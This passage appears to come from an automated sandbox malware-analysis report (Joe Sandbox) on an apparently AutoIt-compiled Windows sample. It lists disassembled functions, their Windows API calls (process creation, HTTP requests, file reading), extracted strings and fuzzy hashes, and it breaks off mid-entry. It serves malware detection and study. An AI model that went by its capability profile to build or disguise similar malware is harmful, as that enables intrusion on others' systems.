                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                  • API String ID: 0-1645009161
                                  • Opcode ID: 9539bec034dc3ea9552e0e04a106cf31dc9a0b5f85c5b1db5b03719e947e41c2
                                  • Instruction ID: d06d86ee6dda47486eb2ab2cdefc8ff447bb185d241d56ed5d30e670c3d6ed2d
                                  • Opcode Fuzzy Hash: 9539bec034dc3ea9552e0e04a106cf31dc9a0b5f85c5b1db5b03719e947e41c2
                                  • Instruction Fuzzy Hash: 5E811571640215BBDF23AF60EC42FBE37A8AF15300F114025FD09AE1A6EB71DA45C7A1
                                  Function 003B5A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadIconW.USER32(00000063), ref: 003B5A2E
                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 003B5A40
                                  • SetWindowTextW.USER32(?,?), ref: 003B5A57
                                  • GetDlgItem.USER32(?,000003EA), ref: 003B5A6C
                                  • SetWindowTextW.USER32(00000000,?), ref: 003B5A72
                                  • GetDlgItem.USER32(?,000003E9), ref: 003B5A82
                                  • SetWindowTextW.USER32(00000000,?), ref: 003B5A88
                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 003B5AA9
                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 003B5AC3
                                  • GetWindowRect.USER32(?,?), ref: 003B5ACC
                                  • _wcslen.LIBCMT ref: 003B5B33
                                  • SetWindowTextW.USER32(?,?), ref: 003B5B6F
                                  • GetDesktopWindow.USER32 ref: 003B5B75
                                  • GetWindowRect.USER32(00000000), ref: 003B5B7C
                                  • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 003B5BD3
                                  • GetClientRect.USER32(?,?), ref: 003B5BE0
                                  • PostMessageW.USER32(?,00000005,00000000,?), ref: 003B5C05
                                  • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 003B5C2F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                  • String ID:
                                  • API String ID: 895679908-0
                                  • Opcode ID: 16e4fe147e0fd33e5727dcdbdbbd67b815d2e11747273b566655711a5043b5d3
                                  • Instruction ID: ba795055abb5eaea2a1d73aace6523c2750774dee6c629c6822e715748dc1a4f
                                  • Opcode Fuzzy Hash: 16e4fe147e0fd33e5727dcdbdbbd67b815d2e11747273b566655711a5043b5d3
                                  • Instruction Fuzzy Hash: B3716231900B05AFDB22DFA8CD85BAEBBF5FF48708F104618E642A69A0D775E945CB50
                                  Function 003B30F7 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: _wcslen
                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[A
                                  • API String ID: 176396367-3789891192
                                  • Opcode ID: 738de0953c48fc5da785f18a53d11e24d701c9b8c3d78aef6aeb87a8eec56e6e
                                  • Instruction ID: 55d1df3e27f5d561dec20d212ec7dee0b13b00dedd0b77d9f0e755dc40f0f247
                                  • Opcode Fuzzy Hash: 738de0953c48fc5da785f18a53d11e24d701c9b8c3d78aef6aeb87a8eec56e6e
                                  • Instruction Fuzzy Hash: 71E13931A00536EBCB269F78C441BFEBBB4BF44714F55811AE65ABB640DB30AF858790
                                  Function 003700C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                  Download Yara Rule
                                  APIs
                                  • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 003700C6
                                    • Part of subcall function 003700ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0042070C,00000FA0,DF2CD8A5,?,?,?,?,003923B3,000000FF), ref: 0037011C
                                    • Part of subcall function 003700ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,003923B3,000000FF), ref: 00370127
                                    • Part of subcall function 003700ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,003923B3,000000FF), ref: 00370138
                                    • Part of subcall function 003700ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0037014E
                                    • Part of subcall function 003700ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0037015C
                                    • Part of subcall function 003700ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0037016A
                                    • Part of subcall function 003700ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00370195
                                    • Part of subcall function 003700ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 003701A0
                                  • ___scrt_fastfail.LIBCMT ref: 003700E7
                                    • Part of subcall function 003700A3: __onexit.LIBCMT ref: 003700A9
                                  Strings
                                  • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00370122
                                  • WakeAllConditionVariable, xrefs: 00370162
                                  • InitializeConditionVariable, xrefs: 00370148
                                  • kernel32.dll, xrefs: 00370133
                                  • SleepConditionVariableCS, xrefs: 00370154
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                  • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                  • API String ID: 66158676-1714406822
                                  • Opcode ID: f5c4b1088c18869c955345ede5dc4171065736ca73c197b80a676742cbb11ba9
                                  • Instruction ID: 77ad8051aa5c4970c588ee48edf53b69b208cfe8ec39a5be287fab69f6a67279
                                  • Opcode Fuzzy Hash: f5c4b1088c18869c955345ede5dc4171065736ca73c197b80a676742cbb11ba9
                                  • Instruction Fuzzy Hash: DC213E36640750EFD7376B64AC85B6E77D8DB44B60F418239F805AA6D1DFB89C008A94
                                  Function 003C44C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                  Download Yara Rule
                                  APIs
                                  • CharLowerBuffW.USER32(00000000,00000000,003ECC08), ref: 003C4527
                                  • _wcslen.LIBCMT ref: 003C453B
                                  • _wcslen.LIBCMT ref: 003C4599
                                  • _wcslen.LIBCMT ref: 003C45F4
                                  • _wcslen.LIBCMT ref: 003C463F
                                  • _wcslen.LIBCMT ref: 003C46A7
                                    • Part of subcall function 0036F9F2: _wcslen.LIBCMT ref: 0036F9FD
                                  • GetDriveTypeW.KERNEL32(?,00416BF0,00000061), ref: 003C4743
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: _wcslen$BuffCharDriveLowerType
                                  • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                  • API String ID: 2055661098-1000479233
                                  • Opcode ID: 949bd3bbff980ae75c97ad5c7e2dd0b042f94401d574e8c3d39cf16c934fa043
                                  • Instruction ID: 06f85000d35d43ef70aa744cc6eeae49fb0d211e405f5db97d72f43733bbde6a
                                  • Opcode Fuzzy Hash: 949bd3bbff980ae75c97ad5c7e2dd0b042f94401d574e8c3d39cf16c934fa043
                                  • Instruction Fuzzy Hash: 06B1D1316083029FC722DF28C8A0F6AB7E5AFA6764F51891DF496CB295D734EC44CB52
                                  Function 003E911E Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00369BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00369BB2
                                  • DragQueryPoint.SHELL32(?,?), ref: 003E9147
                                    • Part of subcall function 003E7674: ClientToScreen.USER32(?,?), ref: 003E769A
                                    • Part of subcall function 003E7674: GetWindowRect.USER32(?,?), ref: 003E7710
                                    • Part of subcall function 003E7674: PtInRect.USER32(?,?,003E8B89), ref: 003E7720
                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 003E91B0
                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 003E91BB
                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 003E91DE
                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 003E9225
                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 003E923E
                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 003E9255
                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 003E9277
                                  • DragFinish.SHELL32(?), ref: 003E927E
                                  • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 003E9371
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#B
                                  • API String ID: 221274066-3902475489
                                  • Opcode ID: 467d797ca8b73d46728fedbeb2381b9df9f486a88cbf7dc09728081f247cf41b
                                  • Instruction ID: d4d4d742d0fa40cbeead4dfd5c20b021ee331d82d89516104be496de2ede6578
                                  • Opcode Fuzzy Hash: 467d797ca8b73d46728fedbeb2381b9df9f486a88cbf7dc09728081f247cf41b
                                  • Instruction Fuzzy Hash: 45619B71108340AFC712DF61DC85EAFBBE8EF88750F400A1EF991971A1DB309A49CB52
                                  Function 003DAFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • _wcslen.LIBCMT ref: 003DB198
                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003DB1B0
                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003DB1D4
                                  • _wcslen.LIBCMT ref: 003DB200
                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003DB214
                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003DB236
                                  • _wcslen.LIBCMT ref: 003DB332
                                    • Part of subcall function 003C05A7: GetStdHandle.KERNEL32(000000F6), ref: 003C05C6
                                  • _wcslen.LIBCMT ref: 003DB34B
                                  • _wcslen.LIBCMT ref: 003DB366
                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 003DB3B6
                                  • GetLastError.KERNEL32(00000000), ref: 003DB407
                                  • CloseHandle.KERNEL32(?), ref: 003DB439
                                  • CloseHandle.KERNEL32(00000000), ref: 003DB44A
                                  • CloseHandle.KERNEL32(00000000), ref: 003DB45C
                                  • CloseHandle.KERNEL32(00000000), ref: 003DB46E
                                  • CloseHandle.KERNEL32(?), ref: 003DB4E3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                  • String ID:
                                  • API String ID: 2178637699-0
                                  • Opcode ID: 1dc281b936238e01db1888e3c84669e0ca294136c722d97cfc51680ab64cbe8d
                                  • Instruction ID: 0fc6675ea5ace8ee71f6e907c52cf467b85c3149dd2d941ecefc94fb17cc637e
                                  • Opcode Fuzzy Hash: 1dc281b936238e01db1888e3c84669e0ca294136c722d97cfc51680ab64cbe8d
                                  • Instruction Fuzzy Hash: F9F17A32504240DFC716EF24D891B6ABBE5AF85314F16895EF8998F3A2DB31EC05CB52
                                  Function 0035326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetMenuItemCount.USER32(00421990), ref: 00392F8D
                                  • GetMenuItemCount.USER32(00421990), ref: 0039303D
                                  • GetCursorPos.USER32(?), ref: 00393081
                                  • SetForegroundWindow.USER32(00000000), ref: 0039308A
                                  • TrackPopupMenuEx.USER32(00421990,00000000,?,00000000,00000000,00000000), ref: 0039309D
                                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 003930A9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                  • String ID: 0
                                  • API String ID: 36266755-4108050209
                                  • Opcode ID: 3e7c3361c342504f9f66b3f0e80137485b1a0dae895286ef20f3daad01fface0
                                  • Instruction ID: 7a863c566b21e13959402b1e3621ba8e3c63b31582dc9c3a7dc057f49fe391e3
                                  • Opcode Fuzzy Hash: 3e7c3361c342504f9f66b3f0e80137485b1a0dae895286ef20f3daad01fface0
                                  • Instruction Fuzzy Hash: 4E71F570644605BEEF238F65CC89FABBF68FF05364F204216F9256A1E0C7B1A914DB90
                                  Function 003E6CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • DestroyWindow.USER32(?,?), ref: 003E6DEB
                                    • Part of subcall function 00356B57: _wcslen.LIBCMT ref: 00356B6A
                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 003E6E5F
                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 003E6E81
                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003E6E94
                                  • DestroyWindow.USER32(?), ref: 003E6EB5
                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00350000,00000000), ref: 003E6EE4
                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003E6EFD
                                  • GetDesktopWindow.USER32 ref: 003E6F16
                                  • GetWindowRect.USER32(00000000), ref: 003E6F1D
                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 003E6F35
                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 003E6F4D
                                    • Part of subcall function 00369944: GetWindowLongW.USER32(?,000000EB), ref: 00369952
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                  • String ID: 0$tooltips_class32
                                  • API String ID: 2429346358-3619404913
                                  • Opcode ID: 5779dcc6601b3e7bdce3e2e02cd2cdac36950d690c5b14ae7af95d05edd0476c
                                  • Instruction ID: 7fa9851180b77b0f58bf47acf702f25d26ca9667c5cc5144a66dfd5121256974
                                  • Opcode Fuzzy Hash: 5779dcc6601b3e7bdce3e2e02cd2cdac36950d690c5b14ae7af95d05edd0476c
                                  • Instruction Fuzzy Hash: F2717870104284AFDB22CF19DC95FAABBE9FB99340F44061DF9898B2A1C770AD46CB15
                                  Function 003CC476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003CC4B0
                                  • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 003CC4C3
                                  • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 003CC4D7
                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 003CC4F0
                                  • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 003CC533
                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 003CC549
                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003CC554
                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 003CC584
                                  • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 003CC5DC
                                  • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 003CC5F0
                                  • InternetCloseHandle.WININET(00000000), ref: 003CC5FB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                  • String ID:
                                  • API String ID: 3800310941-3916222277
                                  • Opcode ID: 979663b5de67e3d044b592c94709aece83f49cdbb8189c3b1a9a1e27cc8de63e
                                  • Instruction ID: 2771ea32b3ab388ec04aa4f3346b34444acdc440fad511a7e8b1ee2c089c53d6
                                  • Opcode Fuzzy Hash: 979663b5de67e3d044b592c94709aece83f49cdbb8189c3b1a9a1e27cc8de63e
                                  • Instruction Fuzzy Hash: 35517AB0510208BFDB228F61C988FAA7BBCFB09344F00951DF94ADA650DB35ED449B60
                                  Function 003E856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 003E8592
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 003E85A2
                                  • GlobalAlloc.KERNEL32(00000002,00000000), ref: 003E85AD
                                  • CloseHandle.KERNEL32(00000000), ref: 003E85BA
                                  • GlobalLock.KERNEL32(00000000), ref: 003E85C8
                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 003E85D7
                                  • GlobalUnlock.KERNEL32(00000000), ref: 003E85E0
                                  • CloseHandle.KERNEL32(00000000), ref: 003E85E7
                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 003E85F8
                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,003EFC38,?), ref: 003E8611
                                  • GlobalFree.KERNEL32(00000000), ref: 003E8621
                                  • GetObjectW.GDI32(?,00000018,000000FF), ref: 003E8641
                                  • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 003E8671
                                  • DeleteObject.GDI32(00000000), ref: 003E8699
                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 003E86AF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
